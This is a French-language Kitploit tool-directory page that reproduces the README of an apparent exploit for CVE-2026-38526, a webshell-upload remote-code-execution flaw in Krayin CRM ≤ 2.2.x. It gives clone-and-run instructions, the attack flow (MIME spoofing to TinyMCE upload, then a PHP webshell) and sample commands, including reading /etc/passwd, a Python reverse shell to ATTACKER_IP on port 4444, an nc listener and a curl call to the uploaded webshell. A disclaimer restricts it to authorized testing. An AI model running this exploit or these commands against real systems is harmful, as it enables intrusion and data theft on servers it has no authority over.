Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-38526 — Exploit automatisé pour Krayin CRM ≤ 2.2.x. | Kitploit
Outils/GitHubGitHub/b0nyo/cve-2026-38526
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubb0nyo/cve-2026-38526

CVE-2026-38526

Exploit automatisé pour Krayin CRM ≤ 2.2.x.

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-38526 - RCE par téléversement PHP sur Krayin CRM

Exploit automatisé pour Krayin CRM ≤ 2.2.x. Ce script exploite une vulnérabilité de téléversement de fichier sans restriction dans l'endpoint TinyMCE (/admin/tinymce/upload), contourne la validation du type MIME en usurpant image/jpeg, téléverse un webshell PHP et exécute des commandes arbitraires avec les privilèges du serveur web.


Détails de la vulnérabilité

PropriétéValeur
ID CVECVE-2026-38526
Logiciel concernéKrayin CRM ≤ 2.2.x
Type de vulnérabilitéTéléversement de fichier sans restriction → Exécution de code à distance
AuthentificationRequise (n'importe quel compte administrateur valide)
EndpointPOST /admin/tinymce/upload

Prérequis

  • Python 3.7+
  • Des identifiants administrateur valides pour l'instance Krayin CRM cible
  • Un accès réseau à l'application cible
  • La bibliothèque requests

Installation

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

Utilisation

root@kitploit:~
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

Arguments

Exemples

root@kitploit:~
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

Déroulement de l'exploit

  1. Authentification : Extraire le jeton CSRF de la page de connexion, s'authentifier avec les identifiants fournis
  2. Validation de session : Extraire un nouveau jeton CSRF du tableau de bord authentifié
  3. Téléversement du webshell : Téléverser la charge utile PHP vers /admin/tinymce/upload avec un type MIME usurpé
  4. Exécution de commandes : Exécuter des commandes arbitraires via le paramètre GET du webshell

Exemple de sortie

root@kitploit:~
[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

Problèmes courants

Échec de l'authentification : Vérifiez que les identifiants sont corrects et que le compte existe sur la cible.

Échec de l'extraction du jeton CSRF : Assurez-vous que la cible exécute une version vulnérable de Krayin CRM et que l'endpoint de connexion est accessible.

Le shell inversé ne se connecte pas : Assurez-vous que votre listener est en cours d'exécution (nc -lvnp <PORT>), que les règles du pare-feu autorisent les connexions sortantes et que l'adresse IP/le port de la charge utile sont corrects.


Avertissement

Cet outil est fourni strictement à des fins de tests de sécurité autorisés et à des fins éducatives uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Les utilisateurs sont seuls responsables de s'assurer qu'ils disposent de l'autorisation appropriée avant de tester un système cible. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.


Références

  • TREXNEGRO Security Advisory - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - Unrestricted File Upload

Auteur

b0nyo - Implémentation du PoC

  • GitHub

TREXNEGRO - Découverte de la vulnérabilité

  • Security Advisories
Télécharger l’outil
OptionDescriptionExemple
-iURL cible (avec ou sans http://)http://target.com ou target.com
-uE-mail/nom d'utilisateur administrateur[email protected]
-pMot de passe administrateurAdminPassword123!
-cCommande à exécuter (par défaut : id)whoami